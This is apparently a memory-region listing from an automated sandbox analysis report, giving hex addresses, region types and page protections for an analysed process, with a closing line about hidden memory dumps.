|
||
|
4580000
|
heap
|
page execute and read and write
|
||
|
4D97000
|
heap
|
page read and write
|
||
|
4DB7000
|
heap
|
page read and write
|
||
|
37FE000
|
stack
|
page read and write
|
||
|
DAD000
|
unkown
|
page read and write
|
||
|
3450000
|
heap
|
page read and write
|
||
|
6A8D000
|
stack
|
page read and write
|
||
|
6A80000
|
direct allocation
|
page read and write
|
||
|
90F8000
|
direct allocation
|
page execute read
|
||
|
DA3000
|
unkown
|
page read and write
|
||
|
4641000
|
trusted library allocation
|
page read and write
|
||
|
4DC6000
|
heap
|
page read and write
|
||
|
6D8E000
|
stack
|
page read and write
|
||
|
3483000
|
heap
|
page read and write
|
||
|
4D7A000
|
heap
|
page read and write
|
||
|
4D88000
|
heap
|
page read and write
|
||
|
340A000
|
heap
|
page read and write
|
||
|
EB0000
|
heap
|
page read and write
|
||
|
9D0000
|
heap
|
page read and write
|
||
|
808E000
|
stack
|
page read and write
|
||
|
9228000
|
direct allocation
|
page execute read
|
||
|
8F0000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
B00000
|
trusted library allocation
|
page read and write
|
||
|
4DCC000
|
heap
|
page read and write
|
||
|
91D000
|
stack
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
5649000
|
trusted library allocation
|
page read and write
|
||
|
B9E000
|
stack
|
page read and write
|
||
|
4D09000
|
stack
|
page read and write
|
||
|
ED5000
|
heap
|
page read and write
|
||
|
4DCC000
|
heap
|
page read and write
|
||
|
73D0000
|
heap
|
page read and write
|
||
|
CFD000
|
stack
|
page read and write
|
||
|
3476000
|
heap
|
page read and write
|
||
|
3A3E000
|
stack
|
page read and write
|
||
|
48F5000
|
trusted library allocation
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E4E000
|
heap
|
page read and write
|
||
|
9200000
|
direct allocation
|
page read and write
|
||
|
5420000
|
direct allocation
|
page read and write
|
||
|
340E000
|
heap
|
page read and write
|
||
|
E60000
|
heap
|
page read and write
|
||
|
793F000
|
direct allocation
|
page read and write
|
||
|
4D58000
|
heap
|
page read and write
|
||
|
9CE000
|
stack
|
page read and write
|
||
|
7410000
|
trusted library allocation
|
page read and write
|
||
|
5484000
|
direct allocation
|
page read and write
|
||
|
5404000
|
direct allocation
|
page read and write
|
||
|
5480000
|
direct allocation
|
page execute read
|
||
|
97E000
|
stack
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
53CE000
|
stack
|
page read and write
|
||
|
4D95000
|
heap
|
page read and write
|
||
|
7380000
|
trusted library allocation
|
page read and write
|
||
|
10ED000
|
stack
|
page read and write
|
||
|
449C000
|
stack
|
page read and write
|
||
|
DB3000
|
unkown
|
page read and write
|
||
|
AF0000
|
trusted library allocation
|
page read and write
|
||
|
4DB0000
|
heap
|
page read and write
|
||
|
72AF000
|
stack
|
page read and write
|
||
|
5EE000
|
stack
|
page read and write
|
||
|
93E000
|
stack
|
page read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
88E0000
|
unkown
|
page readonly
|
||
|
DA3000
|
unkown
|
page write copy
|
||
|
4D8F000
|
heap
|
page read and write
|
||
|
9220000
|
direct allocation
|
page execute read
|
||
|
DBD000
|
unkown
|
page readonly
|
||
|
7220000
|
heap
|
page execute and read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
9100000
|
heap
|
page read and write
|
||
|
452E000
|
stack
|
page read and write
|
||
|
4D9C000
|
heap
|
page read and write
|
||
|
F7B000
|
heap
|
page read and write
|
||
|
C63000
|
unkown
|
page readonly
|
||
|
2FDC000
|
stack
|
page read and write
|
||
|
4DB5000
|
heap
|
page read and write
|
||
|
4DC5000
|
heap
|
page read and write
|
||
|
7129000
|
heap
|
page read and write
|
||
|
898000
|
heap
|
page read and write
|
||
|
6BCA000
|
stack
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
50DE000
|
stack
|
page read and write
|
||
|
845000
|
heap
|
page read and write
|
||
|
BDE000
|
stack
|
page read and write
|
||
|
8B10000
|
direct allocation
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
90F4000
|
direct allocation
|
page read and write
|
||
|
4DCC000
|
heap
|
page read and write
|
||
|
4630000
|
heap
|
page read and write
|
||
|
B22000
|
trusted library allocation
|
page read and write
|
||
|
F28000
|
heap
|
page read and write
|
||
|
49EF000
|
trusted library allocation
|
page read and write
|
||
|
726E000
|
stack
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
839000
|
heap
|
page read and write
|
||
|
8AC000
|
heap
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
3379000
|
stack
|
page read and write
|
||
|
7E8D000
|
stack
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
29CD000
|
stack
|
page read and write
|
||
|
90B0000
|
unkown
|
page readonly
|
||
|
88A000
|
heap
|
page read and write
|
||
|
7079000
|
heap
|
page read and write
|
||
|
EE0000
|
heap
|
page read and write
|
||
|
4DCC000
|
heap
|
page read and write
|
||
|
5418000
|
direct allocation
|
page execute read
|
||
|
C63000
|
unkown
|
page readonly
|
||
|
46A4000
|
trusted library allocation
|
page read and write
|
||
|
4EAD000
|
direct allocation
|
page read and write
|
||
|
5460000
|
direct allocation
|
page execute read
|
||
|
6A91000
|
direct allocation
|
page read and write
|
||
|
53C000
|
stack
|
page read and write
|
||
|
894000
|
heap
|
page read and write
|
||
|
4D6E000
|
heap
|
page read and write
|
||
|
EE8000
|
heap
|
page read and write
|
||
|
732D000
|
stack
|
page read and write
|
||
|
5468000
|
direct allocation
|
page execute read
|
||
|
B09000
|
trusted library allocation
|
page read and write
|
||
|
713F000
|
heap
|
page read and write
|
||
|
CFC000
|
stack
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
6F71000
|
heap
|
page read and write
|
||
|
5450000
|
unclassified section
|
page read and write
|
||
|
9224000
|
direct allocation
|
page read and write
|
||
|
BF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
71BD000
|
stack
|
page read and write
|
||
|
9090000
|
direct allocation
|
page read and write
|
||
|
78F0000
|
direct allocation
|
page read and write
|
||
|
5408000
|
direct allocation
|
page execute read
|
||
|
456E000
|
stack
|
page read and write
|
||
|
90A0000
|
direct allocation
|
page read and write
|
||
|
2E20000
|
trusted library allocation
|
page read and write
|
||
|
6F0E000
|
stack
|
page read and write
|
||
|
5470000
|
direct allocation
|
page read and write
|
||
|
DBD000
|
unkown
|
page readonly
|
||
|
F7F000
|
heap
|
page read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
7EC0000
|
heap
|
page read and write
|
||
|
9230000
|
direct allocation
|
page read and write
|
||
|
7170000
|
trusted library allocation
|
page read and write
|
||
|
3A40000
|
heap
|
page readonly
|
||
|
AF4000
|
trusted library allocation
|
page read and write
|
||
|
72EE000
|
stack
|
page read and write
|
||
|
F69000
|
heap
|
page read and write
|
||
|
90D0000
|
unkown
|
page readonly
|
||
|
DA6000
|
unkown
|
page write copy
|
||
|
5400000
|
direct allocation
|
page execute read
|
||
|
5681000
|
direct allocation
|
page read and write
|
||
|
4D71000
|
heap
|
page read and write
|
||
|
4D8D000
|
heap
|
page read and write
|
||
|
6E8E000
|
stack
|
page read and write
|
||
|
6C60000
|
direct allocation
|
page read and write
|
||
|
7681000
|
direct allocation
|
page read and write
|
||
|
6F4E000
|
stack
|
page read and write
|
||
|
7173000
|
trusted library allocation
|
page read and write
|
||
|
98A000
|
heap
|
page read and write
|
||
|
3433000
|
heap
|
page read and write
|
||
|
7E10000
|
trusted library allocation
|
page read and write
|
||
|
8210000
|
heap
|
page read and write
|
||
|
7EA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
39D0000
|
direct allocation
|
page read and write
|
||
|
313E000
|
stack
|
page read and write
|
||
|
353E000
|
stack
|
page read and write
|
||
|
6BD0000
|
heap
|
page read and write
|
||
|
6A82000
|
direct allocation
|
page read and write
|
||
|
7F0F000
|
stack
|
page read and write
|
||
|
4DAF000
|
heap
|
page read and write
|
||
|
4D7F000
|
heap
|
page read and write
|
||
|
4DCC000
|
heap
|
page read and write
|
||
|
AA0000
|
heap
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
397F000
|
stack
|
page read and write
|
||
|
90DB000
|
unkown
|
page readonly
|
||
|
4DC6000
|
heap
|
page read and write
|
||
|
4DBD000
|
heap
|
page read and write
|
||
|
710000
|
unkown
|
page readonly
|
||
|
4585000
|
heap
|
page execute and read and write
|
||
|
9CC000
|
stack
|
page read and write
|
||
|
37BE000
|
stack
|
page read and write
|
||
|
F6C000
|
heap
|
page read and write
|
||
|
88DA000
|
stack
|
page read and write
|
||
|
711000
|
unkown
|
page execute read
|
||
|
4DC3000
|
heap
|
page read and write
|
||
|
4935000
|
trusted library allocation
|
page read and write
|
||
|
508000
|
stack
|
page read and write
|
||
|
71F0000
|
trusted library allocation
|
page read and write
|
||
|
BE0000
|
heap
|
page readonly
|
||
|
7210000
|
trusted library allocation
|
page read and write
|
||
|
78FF000
|
direct allocation
|
page read and write
|
||
|
9284000
|
direct allocation
|
page read and write
|
||
|
6B4E000
|
stack
|
page read and write
|
||
|
5641000
|
trusted library allocation
|
page read and write
|
||
|
6ECE000
|
stack
|
page read and write
|
||
|
5414000
|
direct allocation
|
page read and write
|
||
|
52DF000
|
stack
|
page read and write
|
||
|
B50000
|
heap
|
page execute and read and write
|
||
|
4D7F000
|
heap
|
page read and write
|
||
|
F02000
|
heap
|
page read and write
|
||
|
5488000
|
direct allocation
|
page execute read
|
||
|
3441000
|
heap
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
78FF000
|
direct allocation
|
page read and write
|
||
|
45E000
|
remote allocation
|
page execute and read and write
|
||
|
7F430000
|
trusted library allocation
|
page execute and read and write
|
||
|
54DD000
|
stack
|
page read and write
|
||
|
810E000
|
stack
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
9270000
|
unkown
|
page readonly
|
||
|
7950000
|
direct allocation
|
page read and write
|
||
|
2B4E000
|
stack
|
page read and write
|
||
|
80F000
|
heap
|
page read and write
|
||
|
7390000
|
trusted library allocation
|
page read and write
|
||
|
9280000
|
direct allocation
|
page execute read
|
||
|
5410000
|
direct allocation
|
page execute read
|
||
|
F65000
|
heap
|
page read and write
|
||
|
5440000
|
direct allocation
|
page execute read
|
||
|
6DCE000
|
stack
|
page read and write
|
||
|
4DB7000
|
heap
|
page read and write
|
||
|
D95000
|
heap
|
page read and write
|
||
|
4DD0000
|
heap
|
page read and write
|
||
|
6B0E000
|
stack
|
page read and write
|
||
|
121F000
|
stack
|
page read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
6A86000
|
direct allocation
|
page read and write
|
||
|
8110000
|
trusted library section
|
page read and write
|
||
|
2E2A000
|
trusted library allocation
|
page read and write
|
||
|
45CE000
|
stack
|
page read and write
|
||
|
892000
|
heap
|
page read and write
|
||
|
4D4E000
|
stack
|
page read and write
|
||
|
57EC000
|
trusted library allocation
|
page read and write
|
||
|
4DD0000
|
heap
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
C00000
|
heap
|
page read and write
|
||
|
795A000
|
direct allocation
|
page read and write
|
||
|
6C80000
|
direct allocation
|
page read and write
|
||
|
479F000
|
trusted library allocation
|
page read and write
|
||
|
F20000
|
heap
|
page read and write
|
||
|
2A0D000
|
stack
|
page read and write
|
||
|
F76000
|
heap
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
3550000
|
direct allocation
|
page read and write
|
||
|
4DC3000
|
heap
|
page read and write
|
||
|
6D0D000
|
stack
|
page read and write
|
||
|
928C000
|
direct allocation
|
page read and write
|
||
|
D40000
|
heap
|
page read and write
|
||
|
493A000
|
trusted library allocation
|
page read and write
|
||
|
71F2000
|
trusted library allocation
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
4A72000
|
trusted library allocation
|
page read and write
|
||
|
4DC5000
|
heap
|
page read and write
|
||
|
54E4000
|
direct allocation
|
page read and write
|
||
|
56A7000
|
trusted library allocation
|
page read and write
|
||
|
B40000
|
trusted library allocation
|
page read and write
|
||
|
B20000
|
trusted library allocation
|
page read and write
|
||
|
54EC000
|
direct allocation
|
page read and write
|
||
|
4D7E000
|
heap
|
page read and write
|
||
|
567F000
|
stack
|
page read and write
|
||
|
711000
|
unkown
|
page execute read
|
||
|
73E0000
|
trusted library allocation
|
page read and write
|
||
|
4D72000
|
heap
|
page read and write
|
||
|
C0B000
|
heap
|
page read and write
|
||
|
540C000
|
direct allocation
|
page read and write
|
||
|
4A02000
|
trusted library allocation
|
page read and write
|
||
|
4ED6000
|
heap
|
page read and write
|
||
|
3A60000
|
heap
|
page read and write
|
||
|
71C0000
|
trusted library section
|
page read and write
|
||
|
EE2000
|
heap
|
page read and write
|
||
|
39BE000
|
stack
|
page read and write
|
||
|
53F0000
|
direct allocation
|
page read and write
|
||
|
AF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
5CE000
|
stack
|
page read and write
|
||
|
9288000
|
direct allocation
|
page execute read
|
||
|
F05000
|
heap
|
page read and write
|
||
|
EAE000
|
stack
|
page read and write
|
||
|
C10000
|
trusted library allocation
|
page read and write
|
||
|
69FE000
|
stack
|
page read and write
|
||
|
54E0000
|
direct allocation
|
page execute read
|
||
|
C09000
|
heap
|
page read and write
|
||
|
4ED0000
|
heap
|
page read and write
|
||
|
10AF000
|
stack
|
page read and write
|
||
|
541C000
|
direct allocation
|
page read and write
|
||
|
5430000
|
heap
|
page execute and read and write
|
||
|
AFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
3453000
|
heap
|
page read and write
|
||
|
793F000
|
direct allocation
|
page read and write
|
||
|
3A53000
|
unclassified section
|
page read and write
|
||
|
710000
|
unkown
|
page readonly
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
4D8B000
|
heap
|
page read and write
|
||
|
EEF000
|
heap
|
page read and write
|
||
|
908E000
|
stack
|
page read and write
|
||
|
4D7F000
|
heap
|
page read and write
|
||
|
3560000
|
heap
|
page read and write
|
||
|
6CA0000
|
heap
|
page read and write
|
||
|
6B8E000
|
stack
|
page read and write
|
||
|
30EF000
|
stack
|
page read and write
|
||
|
4D7F000
|
heap
|
page read and write
|
||
|
2C4F000
|
stack
|
page read and write
|
||
|
4DCC000
|
heap
|
page read and write
|
||
|
2E28000
|
trusted library allocation
|
page read and write
|
||
|
44DE000
|
stack
|
page read and write
|
||
|
39C3000
|
direct allocation
|
page execute read
|
||
|
7160000
|
trusted library allocation
|
page read and write
|
||
|
69BD000
|
stack
|
page read and write
|
||
|
4D50000
|
heap
|
page read and write
|
||
|
DA8000
|
unkown
|
page read and write
|
||
|
54E8000
|
direct allocation
|
page execute read
|
||
|
80CE000
|
stack
|
page read and write
|
||
|
922C000
|
direct allocation
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
7330000
|
trusted library allocation
|
page execute and read and write
|
||
|
78D0000
|
direct allocation
|
page read and write
|
||
|
714C000
|
heap
|
page read and write
|
||
|
548C000
|
direct allocation
|
page read and write
|
||
|
3540000
|
unclassified section
|
page read and write
|
||
|
460E000
|
stack
|
page read and write
|
||
|
39C4000
|
direct allocation
|
page read and write
|
||
|
F8F000
|
heap
|
page read and write
|
||
|
4DBC000
|
heap
|
page read and write
|
||
|
8BA000
|
heap
|
page read and write
|
||
|
7970000
|
direct allocation
|
page read and write
|
||
|
6AA0000
|
direct allocation
|
page read and write
|
||
|
4D94000
|
heap
|
page read and write
|
||
|
AE0000
|
trusted library allocation
|
page read and write
|
||
|
D90000
|
heap
|
page read and write
|
||
|
4D8C000
|
heap
|
page read and write
|
||
|
1120000
|
heap
|
page read and write
|
||
|
7910000
|
direct allocation
|
page read and write
|
||
|
B25000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D79000
|
heap
|
page read and write
|
||
|
90F0000
|
direct allocation
|
page execute read
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
4DA5000
|
heap
|
page read and write
|
||
|
7131000
|
heap
|
page read and write
|
||
|
4DCC000
|
heap
|
page read and write
|
||
|
9210000
|
direct allocation
|
page read and write
|
||
|
59AC000
|
trusted library allocation
|
page read and write
|
||
|
6C40000
|
heap
|
page read and write
|
||
|
7E00000
|
trusted library allocation
|
page read and write
|
||
|
3445000
|
heap
|
page read and write
|
||
|
53D4000
|
direct allocation
|
page read and write
|
||
|
3446000
|
heap
|
page read and write
|
||
|
54F0000
|
heap
|
page read and write
|
||
|
4E90000
|
direct allocation
|
page read and write
|
||
|
53D0000
|
direct allocation
|
page read and write
|
||
|
DB6000
|
unkown
|
page read and write
|
||
|
538F000
|
stack
|
page read and write
|
||
|
A9E000
|
stack
|
page read and write
|
||
|
5464000
|
direct allocation
|
page read and write
|
||
|
7930000
|
direct allocation
|
page read and write
|
||
|
4DB3000
|
heap
|
page read and write
|
||
|
EBA000
|
heap
|
page read and write
|
||
|
4DC6000
|
heap
|
page read and write
|
||
|
E0E000
|
stack
|
page read and write
|
||
|
4D7F000
|
heap
|
page read and write
|
||
|
5692000
|
direct allocation
|
page read and write
|
||
|
90FC000
|
direct allocation
|
page read and write
|
||
|
33F0000
|
direct allocation
|
page execute read
|
||
|
3436000
|
heap
|
page read and write
|
||
|
4F58000
|
trusted library allocation
|
page read and write
|
||
|
7E90000
|
heap
|
page read and write
|
||
|
2B0D000
|
stack
|
page read and write
|
||
|
4CC000
|
stack
|
page read and write
|
||
|
7360000
|
trusted library allocation
|
page read and write
|
||
|
4DD2000
|
heap
|
page read and write
|
||
|
546C000
|
direct allocation
|
page read and write
|
||
|
111E000
|
stack
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
8F9000
|
heap
|
page read and write
|
There are 367 hidden memdumps, click here to show them.